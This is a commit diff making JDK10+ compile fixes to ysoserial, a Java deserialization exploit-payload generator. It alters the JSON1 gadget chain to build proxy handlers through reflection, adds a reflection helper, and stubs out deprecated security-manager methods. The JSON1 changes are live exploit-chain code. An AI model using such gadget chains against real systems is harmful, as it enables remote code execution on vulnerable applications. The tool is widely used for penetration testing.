jdk10+ compile fixes

src/main/java/ysoserial/payloads/JSON1.java

@@ -22,7 +22,6 @@
 import javax.xml.transform.Templates;
 
 import org.springframework.aop.framework.AdvisedSupport;
-import com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl;
 import net.sf.json.JSONObject;
 
 
@@ -95,12 +94,11 @@ public static Map makeCallerChain ( Object payload, Class... ifaces ) throws Ope
         // it's very likely that there are other proxy impls that could be used
         AdvisedSupport as = new AdvisedSupport();
         as.setTarget(payload);
-        InvocationHandler delegateInvocationHandler = (InvocationHandler) Reflections
-                .getFirstCtor("org.springframework.aop.framework.JdkDynamicAopProxy").newInstance(as);
+        InvocationHandler delegateInvocationHandler = (InvocationHandler) Reflections.newInstance("org.springframework.aop.framework.JdkDynamicAopProxy", as);
         InvocationHandler cdsInvocationHandler = Gadgets.createMemoizedInvocationHandler(Gadgets.createMap("getCompositeType", rt));
-        CompositeInvocationHandlerImpl invocationHandler = new CompositeInvocationHandlerImpl();
-        invocationHandler.addInvocationHandler(CompositeData.class, cdsInvocationHandler);
-        invocationHandler.setDefaultHandler(delegateInvocationHandler);
+        InvocationHandler invocationHandler = (InvocationHandler) Reflections.newInstance("com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl");
+        ((Map) Reflections.getFieldValue(invocationHandler, "classToInvocationHandler")).put(CompositeData.class, cdsInvocationHandler);
+        Reflections.setFieldValue(invocationHandler, "defaultHandler", delegateInvocationHandler);
         final CompositeData cdsProxy = Gadgets.createProxy(invocationHandler, CompositeData.class, ifaces);
 
         JSONObject jo = new JSONObject();

src/main/java/ysoserial/payloads/util/Reflections.java

@@ -24,7 +24,7 @@ public static void setFieldValue(final Object obj, final String fieldName, final
 	}
 
 	public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
-		final Field field = getField(obj.getClass(), fieldName);		
+		final Field field = getField(obj.getClass(), fieldName);
 		return field.get(obj);
 	}
 
@@ -33,13 +33,16 @@ public static Constructor<?> getFirstCtor(final String name) throws Exception {
 	    ctor.setAccessible(true);
 	    return ctor;
 	}
-
+
+	public static Object newInstance(String className, Object ... args) throws Exception {
+        return getFirstCtor(className).newInstance(args);
+    }
 
     public static <T> T createWithoutConstructor ( Class<T> classToInstantiate )
             throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
         return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]);
     }
-    
+
     @SuppressWarnings ( {"unchecked"} )
     public static <T> T createWithConstructor ( Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes, Object[] consArgs )
             throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {

src/main/java/ysoserial/secmgr/DelegateSecurityManager.java

@@ -16,12 +16,42 @@ public void setSecurityManager(SecurityManager securityManager) {
 		this.securityManager = securityManager;
 	}
 
+    //BEGIN fixes for JDK10+ compatibility
+
     @SuppressWarnings({"deprecation"})
-    //@Override //fix for JDK10+
+    //@Override
 	public boolean getInCheck() {
-		return getSecurityManager().getInCheck();
+		//return getSecurityManager().getInCheck();
+        return false;
 	}
 
+    @SuppressWarnings({"deprecation"})
+    //@Override
+    public boolean checkTopLevelWindow(Object window) {
+	    //return getSecurityManager().checkTopLevelWindow(window);
+        return true;
+    }
+
+    @SuppressWarnings({"deprecation"})
+    //@Override
+    public void checkSystemClipboardAccess() {
+	    //getSecurityManager().checkSystemClipboardAccess();
+    }
+
+    @SuppressWarnings({"deprecation"})
+    //@Override
+    public void checkAwtEventQueueAccess() {
+        //getSecurityManager().checkAwtEventQueueAccess();
+    }
+
+    @SuppressWarnings({"deprecation"})
+    //@Override
+    public void checkMemberAccess(Class<?> clazz, int which) {
+        //getSecurityManager().checkMemberAccess(clazz, which);
+    }
+
+    //END fixes for JDK10+ compatibility
+
 	@Override
 	public Object getSecurityContext() {
 		return getSecurityManager().getSecurityContext();
@@ -138,29 +168,11 @@ public void checkPropertyAccess(String key) {
 		getSecurityManager().checkPropertyAccess(key);
 	}
 
-    @SuppressWarnings({"deprecation"})
-    @Override
-	public boolean checkTopLevelWindow(Object window) {
-		return getSecurityManager().checkTopLevelWindow(window);
-	}
-
 	@Override
 	public void checkPrintJobAccess() {
 		getSecurityManager().checkPrintJobAccess();
 	}
 
-    @SuppressWarnings({"deprecation"})
-    @Override
-	public void checkSystemClipboardAccess() {
-		getSecurityManager().checkSystemClipboardAccess();
-	}
-
-    @SuppressWarnings({"deprecation"})
-    @Override
-	public void checkAwtEventQueueAccess() {
-		getSecurityManager().checkAwtEventQueueAccess();
-	}
-
 	@Override
 	public void checkPackageAccess(String pkg) {
 
@@ -177,12 +189,6 @@ public void checkSetFactory() {
 		getSecurityManager().checkSetFactory();
 	}
 
-	@SuppressWarnings({"deprecation"})
-	@Override
-	public void checkMemberAccess(Class<?> clazz, int which) {
-		getSecurityManager().checkMemberAccess(clazz, which);
-	}
-
 	@Override
 	public void checkSecurityAccess(String target) {
 		getSecurityManager().checkSecurityAccess(target);